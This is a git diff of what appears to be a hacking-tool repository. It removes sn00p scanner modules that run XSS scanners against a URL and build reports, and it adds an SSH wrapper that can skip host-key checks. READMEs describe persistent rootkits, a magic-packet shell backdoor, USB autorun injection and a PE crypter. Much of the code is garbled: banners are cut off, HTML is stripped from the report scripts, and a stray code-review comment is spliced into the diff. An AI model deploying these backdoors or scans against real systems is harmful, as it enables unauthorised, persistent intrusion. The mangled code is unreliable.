a/automation/sn00p/source/src/modules/web/xss.sh +++ /dev/null 
@@ -1,160 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan for xss vulnerabilities with uwss -# TOOLS: uwss.sh -do_uwss_xss() -{ - opts="-m xss -q" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# scan for xss vulns with xsss -# TOOLS: xsss -do_xsss() -{ - opts="--forms --depth=9" - - xsss ${opts} ${URL} 2>&1 - - return ${SUCCESS} -} - - -# scan for xss vulns with xsser -# TOOLS: xsser -do_xsser() -{ - opts="--Cw=5 --Onm --Ifr --B64 --Coo --Xsa --Xsr --Dcp --Dom --Ind --Anchor" - opts="${opts} --Phpids --auto --follow-redirects" - - xsser ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/wlan/default.sh b/automation/sn00p/source/src/modules/wlan/default.sh deleted file mode 100644 index 1a7c053..0000000 --- a/automation/sn00p/source/src/modules/wlan/default.sh +++ /dev/null 
@@ -1,261 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# check if ip utils is installed -check_ip_utils() -{ - str=`ip 2> /dev/stdout | head -1 | cut -d ' ' -f 1` - - if [ "${str}" = "Usage:" ] - then - iputil="ip" - fi - - return ${SUCCESS} -} - - -# get source ip address -# TOOLS: ifconfig ip -do_srcip() -{ - if [ -z "${SHOST}" ] - then - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | awk '/inet / {print $2}' | sed 's/\/.*//g' \ - 2>&1 - else - ifconfig ${NDEV} | awk '/inet / {print $2}' 2>&1 - fi - else - echo "${SHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get source mac address -# TOOLS: ifconfig -do_srcmac() -{ - if [ -z "${SMAC}" ] - then - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | grep "link/ether" | awk '{print $2}' 2>&1 - else - if [ `uname` = "OpenBSD" ] - then - ifconfig ${NDEV} | awk '/lladdr / {print $2}' 2>&1 - else - ifconfig ${NDEV} | awk '/ether / {print $2}' 2>&1 - fi - fi - else - echo "${SMAC}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get subnet mask -# TOOLS: ifconfig -do_subnetmask() -{ - #if [ "${iputil}" = "ip" ] - 
#then - # ip dev ${NDEV} 2>&1 - #else - #ifconfig ${NDEV} | awk '/inet / {print $4}' 2>&1 - #fi - - ifconfig ${NDEV} | awk '/inet / {print $4}' 2>&1 - - return ${SUCCESS} -} - - -# get broadcast address -# TOOLS: ifconfig -do_broadcast() -{ - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | grep '\' | awk '{print $4}' 2>&1 - else - ifconfig ${NDEV} | awk '/inet / {print $6}' 2>&1 - fi - - return ${SUCCESS} -} - - -# get ip address of router for default route -# TOOLS: netstat -do_routerip() -{ - if [ -z "${RHOST}" ] - then - if [ `uname` = "SunOS" ] - then - netstat -rn | grep "${NDEV}" | grep "default" | tr -s ' ' '-' | - cut -d '-' -f 2 - else - if [ "${iputil}" = "ip" ] - then - ip route | grep 'default' | cut -d ' ' -f 3 2>&1 - else - netstat -rn | grep "${NDEV}" | grep "^0.0.0.0" | - awk '{print $2}' 2>&1 - fi - fi - else - echo "${RHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get mac address of router -# TOOLS: arp -do_routermac() -{ - rhost="`head -1 routerip.log 2> /dev/null`" - - if [ -z "${RMAC}" ] - then - arp -an | grep "\<${rhost}\>" | cut -d ' ' -f 4 2>&1 - else - echo "${RMAC}" 2>&1 - fi - - return ${SUCCESS} -} - - -check_ip_utils - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/report/css.sh b/automation/sn00p/source/src/report/css.sh deleted file mode 100644 index 2c3b3fc..0000000 --- a/automation/sn00p/source/src/report/css.sh +++ /dev/null 
@@ -1,112 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- -make_css_line() -{ - echo "#line" >> ${cfile} - echo "{" >> ${cfile} - echo " background-color: red;" >> ${cfile} - echo " height: 1px;" >> ${cfile} - echo " width: 910px auto;" >> ${cfile} - echo "}" >> ${cfile} - echo >> ${cfile} - - return ${SUCCESS} -} - - -# -make_css_tables() -{ - echo "body table" >> ${cfile} - echo "{" >> ${cfile} - echo " font-size: 12px;" >> ${cfile} - echo " font-family: arial;" >> ${cfile} - echo " width: 200px;" >> ${cfile} - echo "}" >> ${cfile} - echo >> ${cfile} - - return ${SUCCESS} -} - - -# -make_css_links() -{ - echo "body a" >> ${cfile} - echo "{" >> ${cfile} - echo " color: #d8d8d8;" >> ${cfile} - echo " text-decoration: none;" >> ${cfile} - echo "}" >> ${cfile} - echo >> ${cfile} - echo "body a:hover" >> ${cfile} - echo "{" >> ${cfile} - echo " color: #088A08;" >> ${cfile} - echo " text-decoration: none;" >> ${cfile} - echo "}" >> ${cfile} - echo >> ${cfile} - - return ${SUCCESS} -} - - -# -make_css_body() -{ - # body part - echo '@charset "UTF-8";' > ${cfile} - echo >> ${cfile} - echo "body" >> ${cfile} - echo "{" >> ${cfile} - echo " font-size: 12px;" >> ${cfile} - echo " font-family: arial;" >> ${cfile} - echo " width: 910px;" >> ${cfile} - echo " color: #40FF00;" >> ${cfile} - echo " background-color: #000000;" >> ${cfile} - echo "}" >> ${cfile} - echo >> ${cfile} - - return ${SUCCESS} -} - - -# generate css file for html report -make_css() -{ - make_css_body - make_css_links - make_css_tables - make_css_line - - return ${SUCCESS} -} - - -# EOF diff --git a/automation/sn00p/source/src/report/html.sh b/automation/sn00p/source/src/report/html.sh deleted file mode 100644 index 16dc05c..0000000 --- a/automation/sn00p/source/src/report/html.sh +++ /dev/null 
@@ -1,295 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > ${hfile} - msg "" >> ${hfile} - msg "sn00p report" >> ${hfile} - msg '' \ - >> ${hfile} - msg "" >> ${hfile} - msg "" >> ${hfile} - msg '
' >> ${hfile} - msg "

sn00p report (`date +%F`)

" >> ${hfile} - msg '
' >> ${hfile} - - return ${SUCCESS} -} - - -# generate summary -make_html_summary() -{ - msg "

SUMMARY

" >> ${1} - msg "
" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "
HOST${num_hosts}
TCP${num_tcp}
UDP${num_udp}
WWW${num_www}
LAN${num_lan}
WLAN${num_wlan}
" >> ${1} - msg "
" >> ${1} - msg '
' >> ${1} - - return ${SUCCESS} -} - - -# generate target list -make_html_target_list() -{ - # for table rows - cnt="0" - - msg "

TARGET LIST

" >> ${1} - - for i in ${hosts} - do - cnt=`expr ${cnt} + 1` - - # install link - msg "[
${i} ]  " >> ${1} - - # max 8 rows for table - if [ ${cnt} -eq 8 ] - then - msg "
" >> ${1} - cnt="0" - fi - done - - return ${SUCCESS} -} - - -# generate html files for each host and generate the header -make_html_target_files() -{ - for h in ${hosts} - do - make_html_header "report/${h}.html" - done - - return ${SUCCESS} -} - - -# results of tcp or udp based audits -make_port_results() -{ - for j in `ls "${i}/${_prot}" 2> /dev/null` - do - for k in `ls "${i}/${_prot}/${j}" 2> /dev/null` - do - msg "[ ` msg ${j} - ${k} | - sed 's/\.log//'` ]
" >> ${1} - msg "
`cat "${i}/${_prot}/${j}/${k}" | sed 's///g'`
" >> ${1} - done - done - - return ${SUCCESS} -} - - -# generate results of each hosts from the list -make_html_results() -{ - modes="host tcp udp web lan wlan" - - for i in ${hosts} - do - msg "

RESULTS

" >> "report/${i}.html" - make_modules_links "report/${i}.html" - msg "

" >> "report/${i}.html" - for mode in ${modes} - do - for j in `ls "${i}/${mode}" 2> /dev/null` - do - for k in `ls "${i}/${mode}/${j}/" 2> /dev/null` - do - msg "[ ` msg ${j} - ${k} | - sed 's/\.log//'` ]
" >> "report/${i}.html" - msg "
`cat "${i}/${mode}/${j}/${k}" |
-                    sed 's/" >> "report/${i}.html"
-                done
-            done
-        done
-        msg "
" >> "report/${i}.html" - make_html_footer "report/${i}.html" - msg '
' >> "report/${i}.html" - done - - return ${SUCCESS} -} - - -# create links of lan modules in table format -make_lan_links() -{ - msg "LAN

" >> ${1} - - for l in `ls "${i}/lan/"` - do - if [ ${l} ] - then - msg "[ ${l} ]  " >> ${1} - fi - done - - return ${SUCCESS} -} - - -# create links of web modules in table format -make_web_links() -{ - msg "WWW

" >> ${1} - - for w in `ls "${i}/web/" 2> /dev/null` - do - if [ ${w} ] - then - msg "[ ${w} ]  " >> ${1} - fi - done - - return ${SUCCESS} -} - - -# create links of ports in table format -make_port_links() -{ - msg "

${__prot}

" >> ${1} - - for j in `ls "${i}/${_prot}/"` - do - msg "[ ${j} ]  " >> ${1} - done - - return ${SUCCESS} -} - - -# create links of hosts in table format -make_host_links() -{ - msg "HOST

" >> ${1} - - for j in `ls "${i}/host/" 2> /dev/null` - do - if [ ${j} ] - then - msg "[ ${j} ]  " >> ${1} - fi - done - - msg "

" >> ${1} - - return ${SUCCESS} -} - - -# create links of modules in table format using div -make_modules_links() -{ - msg "
" \ - >> ${1} - msg "${i}

" >> ${1} - - if [ ${num_hosts} -gt 0 ] - then - make_host_links ${1} - fi - if [ ${num_tcp} -gt 0 ] - then - _prot="tcp" - __prot="TCP" - fi - if [ ${num_udp} -gt 0 ] - then - _prot="udp" - __prot="UDP" - fi - if [ ${_prot} ] - then - if [ ${num_tcp} -gt 0 -o ${num_udp} -gt 0 ] - then - make_port_links ${1} - fi - else - _prot="tcp" - fi - if [ ${num_www} -gt 0 ] - then - make_web_links ${1} - fi - - msg "
" >> ${1} - msg "
" >> ${1} - - return ${SUCCESS} -} - - -# generate html footer -make_html_footer() -{ - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - - return ${SUCCESS} -} - -# EOF diff --git a/automation/sn00p/source/src/report/report.sh b/automation/sn00p/source/src/report/report.sh deleted file mode 100644 index 9a60916..0000000 --- a/automation/sn00p/source/src/report/report.sh +++ /dev/null @@ -1,108 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-/dev/null | cut -d "/" -f 3 | wc -l`" - num_udp="`find */udp/* -type d 2>/dev/null | cut -d "/" -f 3 | wc -l`" - num_www="`find . -mindepth 2 -maxdepth 2 -type d -name "web" | wc -l`" - num_lan="`find . -mindepth 2 -maxdepth 2 -type d -name "lan" | wc -l`" - num_wlan="`find . -mindepth 2 -maxdepth 2 -type d -name "wlan" | wc -l`" - - return ${SUCCESS} -} - - -# generate report -report() -{ - # report creation date - _date="`date +%F`" - - mkdir "report" - count - - if [ "${report_style}" = "txt" ] - then - report_txt - elif [ "${report_style}" = "html" ] - then - report_html - else - rm -rf "report" > ${VERBOSE} 2>&1 - return ${SUCCESS} - fi - - return ${SUCCESS} -} - -# EOF diff --git a/automation/sn00p/source/src/report/txt.sh b/automation/sn00p/source/src/report/txt.sh deleted file mode 100644 index 7f49f83..0000000 --- a/automation/sn00p/source/src/report/txt.sh +++ /dev/null 
@@ -1,113 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-> "report/${i}.txt" - msg "-----------------------------------------------------------------"\ -"---------------\n" >> "report/${i}.txt" - - for mode in ${modes} - do - for j in `ls "${i}/${mode}" 2> /dev/null` - do - for k in `ls "${i}/${mode}/${j}/" 2> /dev/null` - do - msg "` msg ${j} \(${mode}\) - ${k} | sed 's/\.log//'`\n" \ - >> "report/${i}.txt" - msg "`cat ${i}/${mode}/${j}/${k}`\n" >> "report/${i}.txt" - msg "-----------------------------------------------------"\ -"---------------------------\n" >> "report/${i}.txt" - done - done - done - done - - return ${SUCCESS} -} - - -# generate target list -make_txt_target_list() -{ - tfile="${1}" - - msg "[ TARGET LIST ]\n" >> ${tfile} - - for i in ${hosts} - do - msg "${i}" >> ${tfile} - done - - msg "\n------------------------------------------------------------------"\ -"--------------\n" >> ${tfile} - - return ${SUCCESS} -} - - -# generate text header -make_txt_header() -{ - tfile="${1}" - - msg "sn00p report (`date +%F`)" > ${tfile} - msg "------------------------------------------------------------------"\ -"--------------\n" >> ${tfile} - - return ${SUCCESS} -} - - -# generate text summay -make_txt_summary() -{ - tfile="${1}" - - msg "[ SUMMARY ]\n" >> ${tfile} - msg "HOST\t\t${num_hosts}" >> ${tfile} - msg "TCP\t\t${num_tcp}" >> ${tfile} - msg "UDP\t\t${num_udp}" >> ${tfile} - msg "WWW\t\t${num_www}" >> ${tfile} - msg "LAN\t\t${num_lan}" >> ${tfile} - msg "WLAN\t\t${num_wlan}" >> ${tfile} - msg "" >> ${tfile} - msg "------------------------------------------------------------------"\ -"--------------\n" >> ${tfile} - - return ${SUCCESS} -} - -# EOF diff --git a/automation/sn00p/source/src/sn00p b/automation/sn00p/source/src/sn00p deleted file mode 100755 index c39c7d5..0000000 
--- a/automation/sn00p/source/src/sn00p +++ /dev/null @@ -1,125 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-] [] +OPTIONS: + -m : mode/id to machine + -e: edit conf file [/home/user/.wssh/wssh.conf] + -l: list modes + -S : scp to machine + -s : change file where upload or download file [default:~/] +OVERWRITE: + -u : switch user + -h : switch host + -p : switch port + -c: disable check host fingerprint [default:true] + -x : extra commands +MISC: + -V: print version of wssh and exit + -H: print this help and exit +EXAMPLE: + wssh -m b0x -x'-D1234' # socks proxy mode + wssh -m b0x -S file -d '/data/' # upload file to /data + wssh -m b0x -s file # download file from home + wssh -m b0x -p 1337 -S file # use diff port for b0x config uploading file to home + wssh b0x # no shitty args anymore - just fucking show me the shell :) + + +CONFIGURATION FILE +================== + +$ cat ~/.wssh/wssh.conf + +# id;ip;port[def:22];user;check_host_fingerprint;extra_opt +vulndev;192.168.1.40;;root;false;-Y +android;192.168.1.8;;nrz;false;-Y +debian64;localhost;2222;root;false; +vpn_www;192.168.1.56;3224;nrz;false;false;-L 8080:localhost:80 + + +EXAMPLE +======= + + $ wssh vpn +--==[ wssh by nrz@nullsecurity.net ]==-- +[+] ssh(192.168.1.56:3224) -L 8080:localhost:80 +vpn_www ~ $ + +#eof diff --git a/automation/wssh/source/wssh.sh b/automation/wssh/source/wssh.sh new file mode 100755 index 0000000..083fa62 --- /dev/null +++ b/automation/wssh/source/wssh.sh 
@@ -0,0 +1,315 @@ +#!/bin/bash +################################################################################ +# ____ _ __ # +# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # +# / _ \/ // / / (_-] [] +OPTIONS: + -m : mode/id to machine + -e: edit conf file [${MODE_FILE}] + -l: list modes + -S : scp to machine + -s : change file where upload or download file [default:~/] +OVERWRITE: + -u : switch user + -h : switch host + -p : switch port + -c: disable check host fingerprint [default:true] + -x : extra commands +MISC: + -V: print version of wssh and exit + -H: print this help and exit +EXAMPLE: + wssh -m b0x -x'-D1234' # socks proxy mode + wssh -m b0x -S file -d '/data/' # upload file to /data + wssh -m b0x -s file # download file from home + wssh -m b0x -p 1337 -S file # use diff port for b0x config uploading file to home + wssh b0x # no shitty args anymore - just fucking show me the shell :) +EOF + exit "${SUCCESS}" +} + + +# leet banner, very important +banner() +{ + echo "--==[ wssh by nrz@nullsecurity.net ]==--" + + return "${SUCCESS}" +} + + +# check argument count +check_argc() +{ + if [ "${#}" -lt 1 ] + then + usage + fi + + return "${SUCCESS}" +} + + +# check if required arguments were selected +check_args() +{ + return "${SUCCESS}" +} + + +# parse command line options +get_opts() +{ + while getopts m:elS:s:d:u:h:p:cx:vVH flags + do + case "${flags}" in + m) + MODE=${OPTARG} + ;; + e) + vim "${MODE_FILE}" + exit "${SUCCESS}" + ;; + l) + cat "${MODE_FILE}" + exit "${SUCCESS}" + ;; + S) + SCP=true + UPLOAD="${OPTARG}" + ;; + s) + SCP=true + if [ "${OPTARG:0:1}" == "/" ]; then + DOWNLOAD=${OPTARG} + else + DOWNLOAD="~/${OPTARG}" + fi + ;; + d) + DOWN_UP_DIR=${OPTARG} + ;; + u) + OPT_USER=${OPTARG} + ;; + h) + OPT_HOST=${OPTARG} + ;; + p) + OPT_PORT=${OPTARG} + ;; + c) + OPT_CHECK=true + ;; + x) + OPT_EXTRA=${OPTARG} + ;; + v) + VERBOSE="/dev/stdout" + ;; + V) + echo "${VERSION}" + exit "${SUCCESS}" + ;; + H) + usage + ;; + *) + err "WTF?! 
mount /dev/brain" + ;; + esac + done + + return "${SUCCESS}" +} + +set_vars() +{ + if [ -n "${MODE}" ]; then + local mode_line=$(awk -v J=1 -v R="${MODE}" '{if (match($J, R)) print $0;}' "${MODE_FILE}") + if [ -n "${mode_line}" ]; then + IFS=';' read -r MODE HOST PORT USER CHECK EXTRA <<< "${mode_line}" + else + cri "mode not found" + fi + fi + # set vars - use config from file if not arguments or just defaults + [ -n "${OPT_USER}" ] && USER=${OPT_USER} + [ -n "${OPT_HOST}" ] && HOST=${OPT_HOST} + [ -n "${OPT_PORT}" ] && PORT=${OPT_PORT} + [ -z "${PORT}" ] && PORT=22 + [ -n "${OPT_CHECK}" ] && CHECK=false + [ -n "${OPT_EXTRA}" ] && EXTRA=${OPT_EXTRA} + + # scp + DOWNLOAD_DIR="." + UPLOAD_DIR="~/" + [ -n "${DOWN_UP_DIR}" ] && DOWNLOAD_DIR="${DOWN_UP_DIR}/" + [ -n "${DOWN_UP_DIR}" ] && UPLOAD_DIR="${DOWN_UP_DIR}/" + + return +} + +create_mode_file() +{ + mkdir -p /home/${USER}/.wssh + printf "# id;ip;port[def:22];user;check_host_fingerprint;extra_opt\n" >> ${MODE_FILE} + printf "sample;192.168.1.1;4564;nrz;false;-L 8080:localhost:80\n" >> "${MODE_FILE}" + + return +} + +# controller and program flow +main() +{ + # defaults + CHECK=true + SCP=false + + #gogogo + banner + + #check mode file + ! [ -f "${MODE_FILE}" ] && create_mode_file + + # ssh(lazy(lazy())) -> $ wssh + if [ "$#" == "1" ] && ! 
[ "${1:0:1}" == "-" ]; then + MODE=${1} + else + check_argc ${*} + get_opts ${*} + check_args ${*} + fi + + set_vars + + if ${SCP}; then + printf "[+] scp(%s:%s) %s\n" "${HOST}" "${PORT}" "${EXTRA}" + else + printf "[+] ssh(%s:%s) %s\n" "${HOST}" "${PORT}" "${EXTRA}" + fi + + if ${CHECK}; then + if ${SCP}; then + if [ -n "${UPLOAD}" ]; then + scp -r -P "${PORT}" ${UPLOAD} "${USER}@${HOST}:${UPLOAD_DIR}" + else + scp -r -P "${PORT}" "${USER}@${HOST}:${DOWNLOAD}" "${DOWNLOAD_DIR}" + fi + else + ssh -p "${PORT}" "${USER}@${HOST}" ${EXTRA} + fi + else + if ${SCP}; then + if [ -n "${UPLOAD}" ]; then + scp -r ${DONT_CHECK_HOST} -P "${PORT}" ${UPLOAD} "${USER}@${HOST}:${UPLOAD_DIR}" + else + scp -r ${DONT_CHECK_HOST} -P "${PORT}" "${USER}@${HOST}:${DOWNLOAD}" "${DOWNLOAD_DIR}" + fi + else + ssh ${DONT_CHECK_HOST} -p "${PORT}" "${USER}@${HOST}" ${EXTRA} + fi + fi + + return "${SUCCESS}" +} + +main ${*} + +# EOF diff --git a/backdoor/README.md b/backdoor/README.md index 99a386d..e630379 100644 --- a/backdoor/README.md +++ b/backdoor/README.md @@ -1,5 +1,4 @@ -About -===== +# About Backdoors and rootkits for kernel and userland, network, hardware and software. Once you have gone through all the hard work making sure you can get on the system. Make sure you can always get back in. @@ -7,8 +6,7 @@ system. Make sure you can always get back in. If you find some bugs or if you have any questions, ideas or criticism regarding to this section, feel free to message us. -Disclaimer -========== +# Disclaimer We hereby emphasize, that the hacking related stuff on [nullsecurity.net](http://nullsecurity.net) is only for education purposes. We are not responsible for any damages. You are responsible for your own diff --git a/backdoor/fbkit/README.md b/backdoor/fbkit/README.md new file mode 100644 index 0000000..d383cd8 --- /dev/null +++ b/backdoor/fbkit/README.md 
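Review bot: `if ${CHECK}; then` in `main` executes the value of the config field as a command, so any value other than the literal `true`/`false` (a typo such as `ture` in the fifth field of the mode file) fails with "command not found" and silently takes the else branch — the one that passes `${DONT_CHECK_HOST}` and skips host-key verification. A string comparison is both safer and predictable: `if [ "${CHECK}" = "true" ]; then`, and likewise `if [ "${SCP}" = "true" ]; then` for the `SCP` flag. The argument forwarding `main ${*}` / `check_argc ${*}` / `get_opts ${*}` re-splits arguments on whitespace, so an `-x` value containing spaces is mangled before `getopts` sees it; `"$@"` preserves the original words. `MODE_FILE` and `DONT_CHECK_HOST` are used throughout but defined in the garbled header part of the hunk, so I could not confirm what they expand to; `create_mode_file` also builds the path from `/home/${USER}` rather than `${HOME}`, which differs on systems where the home directory is not under `/home`.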
@@ -0,0 +1,35 @@ +# Description + +A very old FreeBSD rootkit for the 1337 h4x0rs out there. This was my first +attempt to code in FreeBSD kernel land. So bear with me. :) +This version should work for at least for FreeBSD 7 and 8. + +# Usage + +``` +Blah read code. +``` + +# Installation + +Run `install.sh`. + +# Author + +noptrix + +# Notes + +- quick'n'dirty code +- My master-branches are always dev-branches; use releases for stable versions. +- All of my public stuff you find are officially announced and published via [nullsecurity.net](https://www.nullsecurity.net). + +# License + +Check docs/LICENSE. + +# Disclaimer +We hereby emphasize, that the hacking related stuff found on +[nullsecurity.net](http://nullsecurity.net/) are only for education purposes. +We are not responsible for any damages. You are responsible for your own +actions. diff --git a/backdoor/fbkit/release/fbkit-0.0.1.tar.gz b/backdoor/fbkit/release/fbkit-0.0.1.tar.gz new file mode 100644 index 0000000..f0cbd5f Binary files /dev/null and b/backdoor/fbkit/release/fbkit-0.0.1.tar.gz differ diff --git a/backdoor/fbkit/source b/backdoor/fbkit/source new file mode 160000 index 0000000..88ff133 --- /dev/null +++ b/backdoor/fbkit/source @@ -0,0 +1 @@ +Subproject commit 88ff133fd10701564730c419ee44b313a76a6500 diff --git a/backdoor/mbr_store/README.md b/backdoor/mbr_store/README.md index e64cedc..aee48b0 100644 --- a/backdoor/mbr_store/README.md +++ b/backdoor/mbr_store/README.md 
@@ -1,20 +1,13 @@ -Description -=========== +# Description This tool stores up to 426 bytes in the MBR's bootloader code section of unused devices such as usb drivers, hrd disks (which are not supposed to boot) and other media. GRUB detection is implemented for safety reasons, Windows bootloader code will be shamelessly overwritten. ;) -MD5 -=== -ba5fdecf9ff48012030d8d4d3a9a0448 - -Author -====== +# Author atzeton -Disclaimer -========== +# Disclaimer We hereby emphasize, that the hacking related stuff on [nullsecurity.net](http://nullsecurity.net) is only for education purposes. We are not responsible for any damages. You are responsible for your own diff --git a/backdoor/rubilyn/README.md b/backdoor/rubilyn/README.md index e415d4c..689396f 100644 --- a/backdoor/rubilyn/README.md +++ b/backdoor/rubilyn/README.md @@ -1,21 +1,14 @@ -Description -=========== +# Description 64bit Mac OS-X kernel rootkit that uses no hardcoded address to hook the BSD subsystem in all OS-X Lion & below. It uses a combination of syscall hooking and DKOM to hide activity on a host. String resolution of symbols no longer works on Mountain Lion as symtab is destroyed during load, this code is portable on all Lion & below but requires re-working for hooking under Mountain Lion. -MD5 -=== -33102898e02eb66cfc1a8f832472bf9e - -Author -====== +# Author prdelka -Disclaimer -========== +# Disclaimer We hereby emphasize, that the hacking related stuff on [nullsecurity.net](http://nullsecurity.net) is only for education purposes. We are not responsible for any damages. You are responsible for your own diff --git a/backdoor/trixd00r/README.md b/backdoor/trixd00r/README.md new file mode 100644 index 0000000..a69a6e0 --- /dev/null +++ b/backdoor/trixd00r/README.md 
@@ -0,0 +1,16 @@ +# Description +trixd00r is an advanced and invisible userland backdoor based on TCP/IP for UNIX +systems. It consists of a server and a client. The server sits and waits for +magic packets using a sniffer. If a magic packet arrives, it will bind a shell +over TCP or UDP on the given port or connecting back to the client again over +TCP or UDP. The client is used to send magic packets to trigger the server and +get a shell. + +# Author +noptrix + +# Disclaimer +We hereby emphasize, that the hacking related stuff on +[nullsecurity.net](http://nullsecurity.net) is only for education purposes. +We are not responsible for any damages. You are responsible for your own +actions. diff --git a/backdoor/u3-pwn/README.md b/backdoor/u3-pwn/README.md index 8043b76..a2e84c7 100644 --- a/backdoor/u3-pwn/README.md +++ b/backdoor/u3-pwn/README.md @@ -1,19 +1,12 @@ -Description -=========== +# Description U3-Pwn is a tool designed to automate injecting executables to Sandisk smart usb devices with default U3 software install. This is performed by removing the original iso file from the device and creating a new iso with autorun features. -MD5 -=== -ef1d6b0184d5824b43f3870530502d98 - -Author -====== +# Author Zy0d0x -Disclaimer -========== +# Disclaimer We hereby emphasize, that the hacking related stuff on [nullsecurity.net](http://nullsecurity.net) is only for education purposes. We are not responsible for any damages. You are responsible for your own diff --git a/backdoor/u3-pwn/source/src/about.py b/backdoor/u3-pwn/source/src/about.py index 39d2c13..38d74b1 100755 --- a/backdoor/u3-pwn/source/src/about.py +++ b/backdoor/u3-pwn/source/src/about.py 
@@ -40,7 +40,7 @@ banner.print_banner() print ''' - U3-Pwn is a tool designed to automate injecting executerbles to Sandisk + U3-Pwn is a tool designed to automate injecting executables to Sandisk smart usb devices with default U3 software install. This is performed by removing the original iso file from the device and creating a new iso with autorun features. diff --git a/binary/README.md b/binary/README.md index ae39cee..19afc0e 100644 --- a/binary/README.md +++ b/binary/README.md @@ -1,5 +1,4 @@ -About -===== +# About ELF and PE binary related tools. This section includes packers, runtime crypters, including our famous (thanks trusted sec team) hyperion tool from our very own belial and other stuff. @@ -7,8 +6,7 @@ very own belial and other stuff. If you find some bugs or if you have any questions, ideas or criticism regarding to this section, feel free to message us. -Disclaimer -========== +# Disclaimer We hereby emphasize, that the hacking related stuff on [nullsecurity.net](http://nullsecurity.net) is only for education purposes. We are not responsible for any damages. You are responsible for your own diff --git a/binary/hyperion/README.md b/binary/hyperion/README.md index 67dbd9a..3ea83af 100644 --- a/binary/hyperion/README.md +++ b/binary/hyperion/README.md @@ -1,19 +1,12 @@ -Description -=========== -Hyperion is a runtime encrypter for 32-bit portable executables. It is a +# Description +Hyperion is a runtime encrypter for 32/64 bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter". -MD5 -=== -026f63744e92e0bb9a34d3fe858fa75a - -Author -====== +# Author belial -Disclaimer -========== +# Disclaimer We hereby emphasize, that the hacking related stuff on [nullsecurity.net](http://nullsecurity.net) is only for education purposes. We are not responsible for any damages. You are responsible for your own 
diff --git a/binary/hyperion/release/Hyperion-1.2.zip b/binary/hyperion/release/Hyperion-1.2.zip
new file mode 100644
index 0000000..df50b78
Binary files /dev/null and b/binary/hyperion/release/Hyperion-1.2.zip differ
diff --git a/binary/hyperion/release/Hyperion-2.0.zip b/binary/hyperion/release/Hyperion-2.0.zip
new file mode 100644
index 0000000..82d5529
Binary files /dev/null and b/binary/hyperion/release/Hyperion-2.0.zip differ
diff --git a/binary/hyperion/release/Hyperion-2.1.zip b/binary/hyperion/release/Hyperion-2.1.zip
new file mode 100644
index 0000000..c49d541
Binary files /dev/null and b/binary/hyperion/release/Hyperion-2.1.zip differ
diff --git a/binary/hyperion/release/Hyperion-2.2.zip b/binary/hyperion/release/Hyperion-2.2.zip
new file mode 100644
index 0000000..986a2a9
